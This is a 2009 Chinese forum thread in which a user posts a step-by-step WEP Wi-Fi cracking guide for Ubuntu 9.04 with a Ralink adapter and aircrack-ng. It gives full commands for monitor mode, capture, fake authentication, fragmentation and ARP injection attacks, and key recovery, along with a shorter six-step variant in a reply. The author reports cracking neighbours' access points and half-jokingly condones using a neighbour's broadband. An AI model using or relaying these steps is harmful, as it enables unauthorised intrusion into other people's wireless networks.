瑞银100%破解成功的方法
本帖最后由 princerib 于 2009-3-28 23:49 编辑之前试过用minileaf同学的驱动包做的SLAX和BT4使用瑞银网卡来破解都没有成功过,今天把我的Ubuntu8.10升级到了9.04 beta版,忽然心血来潮想看看最新的Ubuntu对瑞银的驱动会不会升级,从而可以破解无线密码,结果还真是惊喜无限,废话不多说了,下面贴图跟各位同学分享。。。
1、安装Ubuntu 9.04 (Jaunty Jackalope) Beta
附下载地址(请根据自己的CPU下载Intel版本还是AMD版本):
http://releases.ubuntu.com/releases/9.04/
建议先装个虚拟光驱软件DAEMON Tools Lite
附下载地址:
http://dl.pconline.com.cn/html_2/1/121/id=1051&pn=0.html
然后用DAEMON加载Ubuntu的ISO包,用它的WUBI来安装,这样一不用刻碟、二不用重新分个区给Ubuntu,就跟给XP安装软件一样,又可以享受双系统,当你不想用它了只要在控制面板删除即可
2、升级ubuntu到最新版本:System->Administration->Update Manager
3、在终端中输入 sudo apt-get install aircrack-ng 安装aircrack-ng
二、破解过程
1、启动无线网卡的监控模式
sudo airmon-ng start wlan0
2、开始抓包
sudo airodump-ng -c 6 --bssid 无线路由MAC地址 --ivs -w TestAP mon0
3、建立虚拟连接
sudo aireplay-ng -1 0 -a 无线路由MAC地址 -h 瑞银网卡MAC地址 mon0
4、使用fragmentation attack来获得PRGA
sudo aireplay-ng -5 -b 无线路由MAC地址 -h 瑞银网卡MAC地址 mon0
5、使用packetforge-ng 来产生一个arp包
packetforge-ng -0 -a 无线路由MAC地址 -h 瑞银网卡MAC地址 5 -k 255.255.255.255 -l 255.255.255.255 -y fragment-0328-170949.xor -w TestAP
6、注入arp包
sudo aireplay-ng -2 -r TestAP -x 1024 mon0
7、开始注入后DATA飞涨
8、DATA涨到一定量后破解密码
sudo aircrack-ng TestAP*.ivs
注:上面图里的无线路由是我自家的,也试过破附近邻居的几个AP都一样成功,另外用aireplay-ng -2 -p 0841破解同样没問题。
顺便打下广告:文明Ceng,最好不要用邻居家的宽带BT,如果真的是不得不用请限制下载速度在总带宽的30%以内! 这个很要支持一下!~~ 谢谢楼主,红旗下怎么用? 还是不太懂,能做个更详细的教程吗? 本帖最后由 codeblue 于 2009-3-28 19:53 编辑
很好。等正式版出来 上ub。。吼吼。习惯 。。每年 都 换两次。都 不怎么用。看来这次可以用久点了。。
吼吼 。。。最后 的广告不错。。。。。 开源的系统我也玩过,不过全是英的。看不懂。 同意文明Ceng,呵呵 谢谢楼主,红旗下怎么用?
无名人 发表于 2009-3-28 19:41 http://forum.anywlan.com/images/common/back.gif
红旗我没用过,关键是瑞银的驱动,ubuntu 9.04 beta自带的瑞银驱动就可以很完美的支持aireplay-ng进行破解(强过SLAX和BT4),你可以在红旗上安装aireplay-ng试试,如果装了后不能破解就是红旗的瑞银驱动不支持。。。 本帖最后由 princerib 于 2009-3-28 23:50 编辑
还是不太懂,能做个更详细的教程吗?
韩寒 发表于 2009-3-28 19:51 http://forum.anywlan.com/images/common/back.gif
ubuntu 9.04 安装可以参照下面的8.04
http://www.ownlinux.cn/2008/04/30/ubuntu-804-wubi/
破解步聚论坛有许多,请善用搜索,其实最简单的就是用下面的六步曲:
1、启动无线网卡的监控模式
sudo airmon-ng start wlan0
2、扫描有哪些AP在线,扫描后按 ctrl+c 退出,保留终端,你可以看到哪些是加密的,用什么加密方式,哪些是没加密的,所在的频道是多少
sudo airodump-ng mon0
3、抓你要破解的AP的数据包,新建终端输入
sudo airodump-ng -c 无线路所在频道 --bssid AP's MAC--ivs -w wep mon0
4、建立虚拟连接,新建终端输入
sudo airodump-ng -c 无线路所在频道 --bssid AP's MAC -w wep mon0
5、-2 -F -p 0841注入,新建终端输入
sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b AP's MAC -h USR's MAC mon0
6、算密码,新建终端输入
sudo aircrack-ng wep*.ivs
注:
wep 为抓取的数据包保存的名字,可以任取
AP's MAC 为无线路由的MAC地址,
USR's MAC 为瑞银网卡的MAC地址,在终端里输入ifconfig 查看,或者在瑞银网卡的背面MAC ID后面跟着的就是
算密码一般在DATA收集到2、3W的时候进行
因为是用-2 -F -p 0841 方式注入,所以破了密码后用ctrl+c 是退不出的,要新建个终端输入 sudo airmon-ng stop mon0 来终止,如果接下来后要破其它的AP,请重复上面的步聚 楼主做个好的教程啊
ioioioio 发表于 2009-3-28 20:35 http://forum.anywlan.com/images/common/back.gif
可以参考我之前发的贴子,http://forum.anywlan.com/viewthread.php?tid=12521&extra=&page=1 开源的系统我也玩过,不过全是英的。看不懂。
韩寒 发表于 2009-3-28 19:52 http://forum.anywlan.com/images/common/back.gif
ubuntu 在刚装的时候是英文的,装好后你只要上网更新一下语言包就是完美的中文版了:lol